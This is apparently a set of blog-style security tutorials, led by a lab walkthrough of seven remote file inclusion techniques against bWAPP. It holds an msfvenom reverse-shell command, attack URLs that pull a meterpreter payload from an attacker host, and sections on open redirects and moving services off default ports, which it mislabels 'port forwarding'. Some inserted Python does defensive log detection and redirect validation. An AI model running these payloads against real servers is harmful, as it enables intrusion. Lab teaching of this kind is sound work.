7 ways to Exploit RFI Vulnerability

In this article you will learn how a web application server can be compromised when it suffers from a remote file inclusion (RFI) vulnerability. I have performed the RFI attack using seven different techniques. The target here is bWAPP, a deliberately buggy web application, and all of the attacks below are carried out against it.

Remote File Inclusion (also known as RFI) is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path of the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, keep in mind that it is also common in other technologies such as JSP, ASP and others.
For more details, see OWASP.org.


Let’s Begin!!!

Basic RFI Attack


Open the target IP in the browser and log in to bWAPP as bee:bug, then choose the bug "Remote & Local File Inclusion" and click Hack.

The requested web page, which suffers from both RFI and LFI, opens. It asks you to select a language from the drop-down list; when you click Go, the selected language file is included through the URL.

Now prepare a malicious PHP file with msfvenom and start a multi/handler in the background:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -f raw
Then copy the highlighted text (the generated PHP payload) into a text file.



If you look at the screenshot below carefully, you will see that I have saved the copied PHP code as shell.php inside /var/www/html, so that shell.php can be included in the RFI attack.


To perform the basic attack, manipulate the URL so that the PHP file is included remotely, changing
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go
into
http://192.168.1.11/bWAPP/rlfi.php?language=http://192.168.1.11/shell.php


As soon as you execute the URL, you will get a reverse connection as a meterpreter session.
meterpreter > sysinfo


Forced Extension RFI Attack
Repeat the same process and add a '?' (question mark) at the end of the URL. Remember that the multi/handler must be running in the background in the Metasploit framework.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go
into
http://192.168.1.11/bWAPP/rlfi.php?language=http://192.168.1.11/shell.php?


Again, when you execute the URL it gives you another meterpreter session.
meterpreter > sysinfo


Null Byte RFI Attack

To perform the null byte attack you need to capture the request sent between the browser and the web server. Start Burp Suite, turn Intercept on and set the browser proxy. In the screenshot you can see that I have captured the GET request.


If you look at the highlighted text in the image below, you will see that I have edited the request to insert a null character for the null byte injection. Before forwarding the GET request, make sure the multi/handler is running in the background, then click Forward.


As soon as the GET request is forwarded, you will get the victim's reverse connection as a meterpreter session.
meterpreter > sysinfo


Change HTTP

The fourth technique is similar to the first; the attacker only needs to make a very small change in the URL. In the following screenshot you will see that I have changed http into HTTP. In some situations, when the security level is increased, lower-case http may fail to include the file remotely.
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go
into
http://192.168.1.11/bWAPP/rlfi.php?language=HTTP://192.168.1.11/shell.php


After making the change, execute the URL, keeping the multi/handler running in the background; it will provide a new meterpreter session again.
meterpreter > sysinfo


Change Image Extension
In the next attack I include an image remotely, which is not a real image but our malicious PHP file. Open your shell.php file, add GIF98 inside the PHP file as shown in the following screenshot, and save it as shell.gif in the same location, /var/www/html.


Here again make a small change in the URL to include the malicious image:
http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go
into
http://192.168.1.11/bWAPP/rlfi.php?language=http://192.168.1.11/shell.gif


When you execute the URL again, another meterpreter session opens for you.
meterpreter > sysinfo


Black List RFI Attack

If you have read the file uploading article you will be aware of blacklists, where we can get our file accepted by changing some letters to upper case to bypass a case-sensitive rule, for example PHP or PHP3.

You can apply this technique when the security level is high: change .php into .PHP. I have renamed shell.php to shell.PHP in the same location and then executed shell.PHP through the URL.

http://192.168.1.113/bWAPP/rlfi.php?language=lang_en.php&action=go
into
http://192.168.1.11/bWAPP/rlfi.php?language=http://192.168.1.11/shell.PHP


From the following screenshot you can see that I have got another session through meterpreter.
meterpreter > sysinfo


Base64 encoded
There is another way to exploit RFI when the security level is high and you are unable to view the PHP file content: use the php://filter wrapper shown below.

I performed this attack with the help of HackBar, a Firefox plug-in. First load the URL, then manipulate it as shown in the screenshot and click Execute.

http://192.168.1.113/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=http://192.168.1.11/shell.php


WONDERFUL!!! We have got a meterpreter session through seven different techniques. You can also perform all these attacks using an online script such as the c99 shell.
meterpreter > sysinfo
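Added here as a defender's check, not code from the article or from bWAPP: the function below inspects the language parameter the way a log review or WAF rule would, flagging every variant used above (a scheme in any letter case, the trailing '?', the .gif and .PHP names, the null byte and php://filter) and treating any value outside an assumed allowlist of language files as suspicious, which is also the fix for the include itself. The log lines are constructed in Apache combined format with the article's IP addresses.

```python
# Added example, not from the article or bWAPP: flag the RFI variants described
# above in web-server access logs and show the allowlist that prevents them.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed set of language files the page may legitimately include: mapping the
# parameter onto an allowlist is the fix, since include() must never take user input.
ALLOWED_LANGUAGE_FILES = {"lang_en.php", "lang_fr.php", "lang_nl.php"}

# Any scheme, in any letter case, turns the include into a remote or wrapper include.
REMOTE_SCHEME = re.compile(r"^\s*(https?|ftps?|php|data|file)\s*:", re.IGNORECASE)


def classify_language_param(request_url: str) -> str:
    """Return 'ok', 'remote', 'nullbyte', 'traversal' or 'unknown' for the language value."""
    query = urlsplit(request_url).query
    for raw in parse_qs(query, keep_blank_values=True).get("language", []):
        value = unquote(raw)            # second decode catches double-encoded values
        if "\x00" in value:             # null byte, as in the Burp-edited request above
            return "nullbyte"
        if REMOTE_SCHEME.match(value):  # http://, HTTP://, trailing '?', .gif, .PHP, php://
            return "remote"
        if "/" in value or "\\" in value or ".." in value:
            return "traversal"          # LFI-style path manipulation
        if value not in ALLOWED_LANGUAGE_FILES:
            return "unknown"
    return "ok"


def flag_rfi_lines(log_lines):
    """Yield (verdict, request_url) for each hostile request in combined-format lines."""
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and (verdict := classify_language_param(m.group(1))) != "ok":
            yield verdict, m.group(1)


# Constructed log lines reproducing the requests shown above (IPs as in the article).
SAMPLE_LOG = [
    '192.168.1.11 - - [01/Jan/2020:10:00:00 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php&action=go HTTP/1.1" 200 512',
    '192.168.1.11 - - [01/Jan/2020:10:00:01 +0000] "GET /bWAPP/rlfi.php?language=http://192.168.1.11/shell.php&action=go HTTP/1.1" 200 12',
    '192.168.1.11 - - [01/Jan/2020:10:00:02 +0000] "GET /bWAPP/rlfi.php?language=HTTP://192.168.1.11/shell.gif%3F&action=go HTTP/1.1" 200 12',
    '192.168.1.11 - - [01/Jan/2020:10:00:03 +0000] "GET /bWAPP/rlfi.php?language=lang_en.php%00&action=go HTTP/1.1" 200 12',
    '192.168.1.11 - - [01/Jan/2020:10:00:04 +0000] "GET /bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=rlfi.php HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for verdict, url in flag_rfi_lines(SAMPLE_LOG):
        print(verdict, url)
```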

Understanding Redirection with Hashing and Crypto Salt (Part 2)

In the previous article we explained the concept of redirection with basic and encoded redirections; in this article we will cover more secure redirection using hashing and salting techniques.

In this article too we will be covering redirection using the same PHP scripts, with small modifications to the code.
Redirection using Hash Values
In the browser, go to http://localhost/hashing/home.php

Hover over Redirect Link, which points to the redirection page (re.php). The redirection link contains not only the URL as a parameter but also its hash: we pass the URL together with a hash value generated with MD5, SHA1, SHA512 or any other hashing algorithm, and the redirection only works if the combination of URL and hash is correct.


(Shown in the figure below.) This is a more secure way of redirection.


For the sake of understanding, our redirection link shows the parameters URL and Hash, but in real development we can hide them so that an attacker cannot judge where the page is being redirected.

When we click Redirect Link, the redirection script on re.php catches the passed URL, generates its hash value (we are using the MD5 algorithm) and compares the generated hash with the hash sent in the request; if both hash values match the redirection works, otherwise it fails.

We are using a hash calculator to generate the MD5 value of "http://www.hackingarticles.in".


The MD5 hash value of "http://www.hackingarticles.in" is 8258c1efb05943d059476150cb22df1d.
In the image below we replace the original hash value of "http://www.hackingarticles.in", which is "8258c1efb05943d059476150cb22df1d", with a different value, for example "9258c1efb05943d059476150cb22df1d" (only the first digit is changed, from 8 to 9).


The redirection fails and the script returns an error message. Finally we send the URL along with the correctly generated hash value as parameters, and the result is shown below.


Redirection using Hash Values with salting

In the browser, go to http://localhost/hashing/home.php (the page where we have our scripts).

Hover over Redirect Link, pointing to the redirection page (re.php). Here we can see one more parameter, salt. In the previous method we worked with plain hash values; with salting we introduce a salt parameter and generate the hash of the URL after prepending or appending the salt value to it. The salt value could be anything: a combination of characters, digits, alphanumerics, special characters or whatever we want (in this example we are using the salt value "ignite"). By using salts we further increase the security of the redirect.



For the sake of understanding, our redirection link shows the parameters URL, Hash and Salt, but in real development we can hide them so that an attacker cannot judge where the page is being redirected.
When we click Redirect Link, the redirection script on re.php catches the passed URL, generates its hash value (we are using the SHA1 algorithm) after prepending the salt value (ignite) to the URL, and compares the generated hash with the hash sent in the request; if both hash values match the redirection works, otherwise it fails.


In the above image we generate the SHA1 hash value by prepending the salt "ignite" to the URL "http://www.hackingarticles.in". We can use any online/offline converter; in this example we generate the SHA1 hash through http://online-code-generator.com/sha1-hash-with-optional-salt.php


The SHA1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626


If the hash value sent is different from the original value, our script returns an error. In the image below we change the SHA1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (only the first digit is replaced, from 5 to 8) and get the following result.

Finally we send the URL along with the generated hash value as a parameter, and the result is shown below.
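The check described in both sections above, as an added Python example rather than the article's own re.php, with one caveat a reviewer would raise: an MD5 of a public URL, or a SHA1 of a salt that travels in the same link, can be recomputed by anyone who reads the link, so those tags only catch accidental corruption, while a keyed HMAC with a secret that stays on the server makes the tag unforgeable. The secret key below is a constructed placeholder.

```python
# Added example, not the article's re.php: the URL + hash check described above,
# plus the keyed (HMAC) form that makes the tag unforgeable when the secret stays
# on the server instead of travelling in the link as the salt parameter does.
import hashlib
import hmac

SALT = "ignite"                                             # the article's salt value
SERVER_SECRET = b"replace-with-a-random-server-side-key"    # constructed placeholder


def url_md5(url: str) -> str:
    """Unsalted MD5 of the URL: the first scheme (hashing/home.php)."""
    return hashlib.md5(url.encode()).hexdigest()


def url_salted_sha1(url: str, salt: str = SALT) -> str:
    """SHA1 over salt + URL, salt in front: the second scheme."""
    return hashlib.sha1((salt + url).encode()).hexdigest()


def url_hmac(url: str, key: bytes = SERVER_SECRET) -> str:
    """HMAC-SHA256 over the URL with a key that is never sent to the client."""
    return hmac.new(key, url.encode(), hashlib.sha256).hexdigest()


TAG_FUNCS = {"md5": url_md5, "sha1": url_salted_sha1, "hmac": url_hmac}


def redirect_allowed(url: str, presented_tag: str, scheme: str = "hmac") -> bool:
    """re.php's decision: recompute the tag for the requested URL and compare it
    to the one in the request, in constant time so mismatches leak no timing."""
    return hmac.compare_digest(TAG_FUNCS[scheme](url), presented_tag)


def flip_first_hex_digit(tag: str) -> str:
    """The article's tamper test: change only the first hex digit of the tag."""
    return ("9" if tag[0] != "9" else "8") + tag[1:]


if __name__ == "__main__":
    url = "http://www.hackingarticles.in"
    for scheme, fn in TAG_FUNCS.items():
        tag = fn(url)
        print(scheme, tag, redirect_allowed(url, tag, scheme),
              redirect_allowed(url, flip_first_hex_digit(tag), scheme))
```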


Understanding Redirection with Encoding Techniques (Part 1)

A redirect automatically sends a website's visitors to a different location or URL; the redirection can point to a different location within the same site, or to a new site or web page.

Insecure redirects and forwards are the outcome when a web application accepts untrusted input that causes it to redirect the request to a URL contained in that untrusted, unvalidated input; this type of redirection is also called unvalidated redirection.

We demonstrate the concept and types of redirection through PHP code running under an Apache server on a local machine running Kali Linux. WAMP or XAMPP can be used on a Windows machine to run the same code. To execute our redirection scripts, put the code in the /var/www/html directory, which is the directory served as localhost (in our case).
References
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Basic Redirection
In the browser, go to localhost/redirect/home.php

Hover over Redirect Link, pointing to the redirection page (re.php). We can see the redirection target in clear text (as shown in the figure below).


When we click this link we are redirected to http://www.hackingarticles.in, as coded in our redirection script (re.php).


This is basic redirection, where we simply redirect users from one page to another through PHP scripts without taking any security measures into account. The encoded forms of the redirect parameter are explained below.

URL Encoding
In the browser, go to localhost/hex/home.php (the page where we have our scripts)
Hover over Redirect Link, pointing to the redirection page (re.php). We can see the redirection target in clear text (as shown in the figure below).



Here we use the same script for the home page, but in this redirection we use simple URL encoding: the URL is sent in URL-encoded form and decoded by the script running on the redirect page (re.php in this case).
We can use any online/offline converter to calculate the URL-encoded value (in this example we use http://www.meyerweb.com/).
Refer to the screenshot below for the URL encoding.




Right-click Redirect Link on home.php, copy the link location and paste the URL into a new tab. If we replace the redirect URL with its URL-encoded value we land on the same page.


The following is the result


HEX Encoding
Here we convert the URL to its hexadecimal (percent-encoded) value using Burp Suite (you can use any online/offline tool).


The single hex-encoded value of http://www.hackingarticles.in is
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e
Right-click Redirect Link on home.php, copy the link location and paste the URL into a new tab. If we replace the redirect URL with the single hex-encoded value we land on the same page.


The following is the result


Multilevel Encoding
Here we demonstrate multilevel encoding, where we re-encode the already encoded value.


The double hex-encoded value of http://www.hackingarticles.in is
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Right-click Redirect Link on home.php, copy the link location and paste the URL into a new tab. If we replace the redirect URL with the double hex-encoded value we land on the same page.



The following is the result



Base 64 Encoded Redirection

In the browser, go to http://localhost/base64/home.php
Hover over Redirect Link, pointing to the redirection page (re.php). Here we pre-encode our URL to its Base64 value, so the URL is no longer readable to the naked eye (as shown in the figure below).



The image below shows the Base64 encoding of our URL http://www.hackingarticles.in



The Base64-encoded value of http://www.hackingarticles.in is
"aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4="

The following is the output
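Added as an example that is not part of the article: Python versions of the three encodings above, run on the article's URL, together with the canonicalization a redirect validator needs before it inspects the destination. The point it demonstrates is that a filter which percent-decodes only once never sees through the double-encoded form, so the validator must decode until the value stops changing and then compare the host exactly; the allowed host is an assumption for the example.

```python
# Added example, not from the article: the three encodings shown above and the
# repeated decoding a redirect validator must do before checking the destination.
import base64
from urllib.parse import unquote, urlsplit

URL = "http://www.hackingarticles.in"


def hex_encode_all(text: str) -> str:
    """Percent-encode every byte (the 'single hex' form produced with Burp)."""
    return "".join(f"%{b:02x}" for b in text.encode())


def double_hex_encode(text: str) -> str:
    """Encode the already percent-encoded string once more ('multilevel encoding')."""
    return hex_encode_all(hex_encode_all(text))


def base64_encode(text: str) -> str:
    """Base64 form of the URL, as carried by the base64/home.php link."""
    return base64.b64encode(text.encode()).decode()


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, then unwrap Base64 if present.
    A filter that decodes only once accepts the double-encoded form unchecked."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    try:
        raw = base64.b64decode(value, validate=True).decode("ascii")
        if raw.lower().startswith(("http://", "https://")):
            return raw
    except (ValueError, UnicodeDecodeError):
        pass  # not Base64 (or not a URL): keep the percent-decoded value
    return value


def redirect_is_safe(value: str, allowed_hosts=("www.hackingarticles.in",)) -> bool:
    """Decide on the canonical form and compare the host exactly, not as a substring."""
    return urlsplit(canonicalize(value)).hostname in allowed_hosts
```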

How to Secure Your Port using Port Forwarding

In this article I am going to show how to use port forwarding on a system. Port forwarding is a process that redirects a communication request from a specific port to another port or host; it basically allows an outside computer to connect to a computer in a private local area network. Commonly forwarded ports include port 22 for SSH access, port 80 for web servers and port 21 for FTP. The major advantage is that it provides security to your private network and secure communication.
Let's start!!!!

HTTP and HTTPS forwarding
Open the ports.conf file inside /etc/apache2 and run the following command to read the configuration:
cat ports.conf


From the screenshot you can see the present listening ports, 80 and 443, for the web server.


If an attacker wants to send a malicious file through the web server, he will try to connect to the target on port 80 and send the phishing page to the target.

In order to protect yourself from being targeted through a phishing page, change the port numbers 80 and 443 to other numbers.

If you look at the following screenshot you will see that I have modified port 80 into 8088 and port 443 into 44343.


FTP port forwarding
Now open the vsftpd.conf file inside /etc.
From the screenshot you can see that the listen port is 21 by default; to protect yourself from FTP attacks, move the FTP service to another port.


From the screenshot below you will see that I have changed port 21 into 2121.


SSH port forwarding

Open the file sshd_config from /etc/ssh/sshd_config
From the screenshot you will see that by default port 22 is used as the listen port, which is badly affected by DDoS attacks. To protect yourself, apply the port forwarding technique to port 22.


From the image below, again you will notice that I have changed port 22 into port 2222.


Now if you scan your network with Nmap you will find that the FTP, HTTP and SSH services are running successfully on the modified ports.
nmap -p- -sV 192.168.1.24
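Added here as a post-edit check, not code from the article: it parses the Listen, listen_port and Port directives of the three files edited above and reports any service still on its well-known default port, on file contents constructed to mirror the edits (8088, 44343, 2121, 2222). Keep in mind that a moved port only hides the service from scans of common ports; the full-range nmap -p- scan the article ends with still finds it, so this is a hygiene check, not a substitute for patching and access control.

```python
# Added example, not from the article: audit the three configuration files edited
# above and report any service that still listens on its default port.
import re

DEFAULTS = {"apache": {80, 443}, "vsftpd": {21}, "sshd": {22}}


def apache_listen_ports(text: str) -> set:
    """Ports from active 'Listen' lines in ports.conf ('Listen 443', 'Listen 1.2.3.4:8088')."""
    pattern = re.compile(r"^\s*Listen\s+(?:\S*:)?(\d+)", re.MULTILINE | re.IGNORECASE)
    return {int(m.group(1)) for m in pattern.finditer(text)}


def vsftpd_listen_port(text: str) -> int:
    """listen_port=NNN from vsftpd.conf, or the default 21 when absent or commented out."""
    m = re.search(r"^\s*listen_port\s*=\s*(\d+)", text, re.MULTILINE)
    return int(m.group(1)) if m else 21


def sshd_ports(text: str) -> set:
    """All active 'Port' lines in sshd_config (several are allowed); default 22 when none."""
    pattern = re.compile(r"^\s*Port\s+(\d+)", re.MULTILINE | re.IGNORECASE)
    return {int(m.group(1)) for m in pattern.finditer(text)} or {22}


def still_on_defaults(apache_conf: str, vsftpd_conf: str, sshd_conf: str) -> dict:
    """Map service -> set of ports that are still at their default; empty dict when clean."""
    current = {
        "apache": apache_listen_ports(apache_conf),
        "vsftpd": {vsftpd_listen_port(vsftpd_conf)},
        "sshd": sshd_ports(sshd_conf),
    }
    return {svc: current[svc] & DEFAULTS[svc] for svc in DEFAULTS if current[svc] & DEFAULTS[svc]}


# Constructed file contents mirroring the edits shown in the article.
PORTS_CONF = "Listen 8088\n<IfModule ssl_module>\n\tListen 44343\n</IfModule>\n"
VSFTPD_CONF = "listen=YES\n#listen_port=21\nlisten_port=2121\n"
SSHD_CONFIG = "#Port 22\nPort 2222\n"

if __name__ == "__main__":
    print(still_on_defaults(PORTS_CONF, VSFTPD_CONF, SSHD_CONFIG) or "no service on a default port")
```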